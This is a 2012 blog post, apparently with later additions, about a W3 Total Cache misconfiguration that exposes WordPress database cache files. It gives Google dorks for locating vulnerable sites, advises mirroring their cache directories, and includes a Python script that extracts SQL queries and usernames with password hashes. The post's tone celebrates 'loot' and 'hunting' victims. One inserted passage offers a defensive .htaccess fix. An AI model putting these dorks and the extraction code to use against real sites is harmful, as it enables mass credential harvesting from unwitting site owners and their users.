Saturday, 29 December 2012

The new Wordpress Vuln and How to find its victims

A sample of the loot from the W3 Total Cache vuln
So an interesting little misconfiguration has reared its ugly head on a number of WordPress sites. The vulnerability affects WordPress sites that use the "W3 Total Cache" plugin (http://wordpress.org/extend/plugins/w3-total-cache/) with its database cache switched on.

In this post I'll explain exactly what the vulnerability is and why it's bad news, then quickly cover how to find vulnerable sites and show some of the loot you can dig out of them. Enjoy!




What is W3 Total Cache?

W3 Total Cache improves the user experience of your site by improving your server performance, caching every aspect of your site, reducing the download times and providing transparent content delivery network (CDN) integration ---http://wordpress.org/extend/plugins/w3-total-cache/
So what's gone wrong? Well, it turns out that if you're going to cache EVERYTHING, including things like
  • SQL queries and the results they return
  • Cookie values
  • Usernames and password hashes
  • etc.
basically every transaction users have with your WordPress site, then you need to make sure malicious users can't read those cache records!

W3 Total Cache leaves the database cache files downloadable by anyone who can guess their URL; the report on 1337day.com also notes that:
Even with directory listings off, cache files are by default publicly downloadable, and the key values / file names of the database cache items are easily predictable. Again, it seems odd that "deny from all" isn't added to the .htaccess file. Maybe it's documented somewhere that you should secure your directories, or maybe it isn't; I'm not sure. --- http://1337day.com/exploit/20048
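As an added illustration (not from the post, the 1337day report or the plugin's own shipped files), this is the kind of .htaccess a site owner would drop into the cache directory to close the hole. The wp-content/w3tc/dbcache/ path is assumed from the search terms used in this post, and the directive names are plain Apache syntax:

```apache
# wp-content/w3tc/dbcache/.htaccess
#
# Weak default being described in the report: no .htaccess at all in the
# cache directory, so every dbcache file is served to anyone who asks for
# it by name, directory listing or not.
#
# Hardened version: refuse direct web access to everything under this
# directory. The plugin reads the files from disk via PHP, not over HTTP,
# so nothing legitimate needs them to be web-accessible.

# Apache 2.2 (current when this post was written)
Order deny,allow
Deny from all

# Apache 2.4 equivalent (uncomment if you are on 2.4)
# Require all denied
```

This only takes effect if the server's AllowOverride setting lets .htaccess files carry access directives, so verify rather than assume: request one of the cache files you found through the dorks with curl and expect a 403, not a 200. On nginx, which ignores .htaccess entirely, the same effect needs a location block for the dbcache path with deny all in the server configuration.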
Okay, so now you have the details, let's look at how to hunt for these poor sites.



Finding Vulnerable Servers

As most of you guessed, I'm going to share a dork, or rather a couple of dorks, that list directories containing downloadable dbcache files (0..9 is Google's number-range operator, here matching the numeric directory names beneath dbcache):
  1. inurl:w3tc/dbcache/0..9 +inurl:wp-content
  2. inurl:w3tc +inurl:/dbcache/ +inurl:0..9 +inurl:wp-content
You can generate more by fiddling with the terms, breaking them up and maybe using verbatim searching, but these should already give you a pretty exhaustive list.


Examining the Loot

After running the dorks, you should stumble into directories that look like this:

These are the directories you're looking for

You can then navigate down the directories by hand, or pull everything with something like wget (its site-mirror option, wget -m) or curl if you prefer; the 1337day report also includes a little tool that downloads all the dbcache files.

Opening one of the files you should see something like this:

Looking at one of the dbcache files, it's really just a serialized PHP object

To me this looks like a serialized PHP object. You can see some really interesting things logged here, such as SELECT queries, and you can often pull out usernames and password hashes, like this:

I've removed some details, but you can clearly see the hash here
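As an added example (not code from the post, the 1337day report or the plugin), here is a small Python parser for the kind of file described above: it skips whatever sits in front of the serialized payload, unserializes the PHP value, and pulls out the cached SQL text and any wp_users rows. The sample file bytes are constructed; the top-level keys (query, result) and the leading 4-byte expiry header are assumptions about the on-disk layout rather than something the post shows, while user_login and user_pass are the real wp_users column names.

```python
import re
import struct
from typing import Any, Dict, List, Tuple

# Start of a serialized PHP array or object; used to skip any non-serialized
# prefix the cache writer may put in front of the payload.
_PAYLOAD_START = re.compile(rb'(?:a:\d+:\{|O:\d+:")')


class PhpUnserializer:
    """Recursive-descent parser for PHP's serialize() format: N, b, i, d,
    s, a and O. Objects come back as dicts carrying a "__class__" entry."""

    def __init__(self, data: bytes) -> None:
        self.data, self.pos = data, 0

    def _expect(self, literal: bytes) -> None:
        if not self.data.startswith(literal, self.pos):
            raise ValueError(f"expected {literal!r} at offset {self.pos}")
        self.pos += len(literal)

    def _read_until(self, delim: bytes) -> bytes:
        end = self.data.index(delim, self.pos)
        token = self.data[self.pos:end]
        self.pos = end + len(delim)
        return token

    def _read_members(self, count: int) -> Dict[Any, Any]:
        self._expect(b"{")
        members: Dict[Any, Any] = {}
        for _ in range(count):
            key = self.parse()          # array keys / property names
            members[key] = self.parse()
        self._expect(b"}")
        return members

    def parse(self) -> Any:
        tag = self.data[self.pos:self.pos + 1]
        self.pos += 1
        if tag == b"N":                 # N;
            self._expect(b";")
            return None
        if tag == b"b":                 # b:1;
            self._expect(b":")
            return self._read_until(b";") == b"1"
        if tag == b"i":                 # i:42;
            self._expect(b":")
            return int(self._read_until(b";"))
        if tag == b"d":                 # d:1.5;
            self._expect(b":")
            return float(self._read_until(b";"))
        if tag == b"s":                 # s:5:"hello";  (length is in bytes)
            self._expect(b":")
            length = int(self._read_until(b":"))
            self._expect(b'"')
            raw = self.data[self.pos:self.pos + length]
            self.pos += length
            self._expect(b'";')
            return raw.decode("utf-8", "replace")
        if tag == b"a":                 # a:2:{key;value;...}
            self._expect(b":")
            return self._read_members(int(self._read_until(b":")))
        if tag == b"O":                 # O:8:"stdClass":2:{...}
            self._expect(b":")
            self._read_until(b":")      # class-name length, not needed
            self._expect(b'"')
            class_name = self._read_until(b'"').decode()
            self._expect(b":")
            members = self._read_members(int(self._read_until(b":")))
            members["__class__"] = class_name
            return members
        raise ValueError(f"unknown type tag {tag!r} at offset {self.pos - 1}")


def parse_dbcache_file(blob: bytes) -> Any:
    """Skip anything ahead of the serialized payload and parse it."""
    m = _PAYLOAD_START.search(blob)
    if m is None:
        raise ValueError("no serialized PHP array/object found")
    return PhpUnserializer(blob[m.start():]).parse()


def _walk(node: Any):
    """Yield every dict reachable from node (arrays and objects alike)."""
    if isinstance(node, dict):
        yield node
        for value in node.values():
            yield from _walk(value)


def extract_queries(tree: Any) -> List[str]:
    """Return every string value that looks like an SQL statement."""
    sql = re.compile(r"^\s*(SELECT|INSERT|UPDATE|DELETE)\b", re.I)
    return [v for d in _walk(tree) for v in d.values()
            if isinstance(v, str) and sql.match(v)]


def extract_credentials(tree: Any) -> List[Tuple[str, str]]:
    """Return (user_login, user_pass) for every cached wp_users row."""
    return [(d["user_login"], d["user_pass"]) for d in _walk(tree)
            if "user_login" in d and "user_pass" in d]


# Constructed sample: a cached wpdb result for a login lookup. The 'query' /
# 'result' keys and the packed expiry timestamp in front are assumptions.
SAMPLE_FILE = struct.pack("<L", 1356739200) + (
    b'a:2:{s:5:"query";s:49:"SELECT * FROM wp_users WHERE user_login = \'admin\'";'
    b's:6:"result";a:1:{i:0;O:8:"stdClass":4:{'
    b's:2:"ID";s:1:"1";'
    b's:10:"user_login";s:5:"admin";'
    b's:9:"user_pass";s:34:"$P$BQ7mXvZ2p9kLwJ4tR8sYhN1cA6eD0u/";'
    b's:10:"user_email";s:17:"admin@example.com";}}}'
)

if __name__ == "__main__":
    tree = parse_dbcache_file(SAMPLE_FILE)
    for q in extract_queries(tree):
        print("query:", q)
    for login, pw_hash in extract_credentials(tree):
        print(f"user {login}: {pw_hash}")
```

Run it against a downloaded cache file with parse_dbcache_file(open(path, "rb").read()). A hash beginning with $P$ is a phpass portable hash (salted, iterated MD5), so what you recover is a hash to crack rather than a password; the point of the exposure is that an attacker gets it without ever touching the database.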
Anyway, I thought this was worth a mention since there's still quite a bit of loot left on the net.

Thanks for reading
and Happy Hunting ;)